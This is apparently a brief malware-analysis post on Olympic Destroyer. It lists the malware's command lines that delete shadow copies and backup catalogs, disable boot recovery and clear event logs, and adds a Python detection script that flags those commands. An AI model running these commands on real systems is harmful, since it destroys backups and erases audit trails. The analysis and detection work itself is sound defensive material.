Malware Analysis — Olympic Destroyer

Image from WIRED article. Illustration: Joan Wong



Dynamic Analysis of Olympic Destroyer




C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System

C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
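The command lines above delete volume shadow copies and the backup catalog, turn off boot recovery, and clear the System and Security event logs. The following is an added detection example, not code from the original article: it matches those commands in process-creation events and alerts only when several of them occur on one host in a short span. The event tuple layout, host names, window and threshold are assumptions, and the sample events are constructed.

```python
import re

# Rules cover only the command lines listed above; matched against a
# lower-cased, whitespace-normalised process command line.
RULES = [
    ("shadow_copy_delete", r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    ("backup_catalog_delete", r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"),
    ("boot_failures_ignored",
     r"\bbcdedit(\.exe)?\s+/set\s+\S+\s+bootstatuspolicy\s+ignoreallfailures\b"),
    ("recovery_disabled", r"\bbcdedit(\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no\b"),
    ("event_log_cleared", r"\bwevtutil(\.exe)?\s+cl\s+(system|security)\b"),
]
RULES = [(label, re.compile(rx)) for label, rx in RULES]

def classify(cmdline):
    """Return the labels of every rule the command line matches."""
    norm = re.sub(r"\s+", " ", cmdline.lower().replace('"', ""))
    return [label for label, rx in RULES if rx.search(norm)]

def correlate(events, window=60, threshold=3):
    """events: (epoch_seconds, host, cmdline). Alert on a host when at least
    `threshold` distinct behaviours start within `window` seconds (assumed values)."""
    hits = {}
    for ts, host, cmdline in events:
        for label in classify(cmdline):
            hits.setdefault(host, []).append((ts, label))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            labels = {lab for t, lab in seen[i:] if t - start <= window}
            if len(labels) >= threshold:
                alerts[host] = sorted(labels)
                break
    return alerts

CMD = r"C:\Windows\system32\cmd.exe /c "
# Constructed sample events: WS01 replays the commands above, ADMIN01 is routine admin work.
SAMPLE = [
    (1000, "WS01", CMD + r"c:\Windows\system32\vssadmin.exe delete shadows /all /quiet"),
    (1001, "WS01", CMD + "wbadmin.exe delete catalog -quiet"),
    (1002, "WS01", CMD + "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
                         " & bcdedit /set {default} recoveryenabled no"),
    (1003, "WS01", CMD + "wevtutil.exe cl System"),
    (1004, "WS01", CMD + "wevtutil.exe cl Security"),
    (2000, "ADMIN01", "vssadmin.exe delete shadows /for=C: /oldest"),
    (9000, "ADMIN01", "wevtutil.exe cl Application"),
]

if __name__ == "__main__":
    for host, labels in correlate(SAMPLE).items():
        print(host, labels)
```

Requiring several distinct behaviours per host keeps a single routine shadow-copy cleanup from alerting, while the full sequence listed above does.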



System Stealer



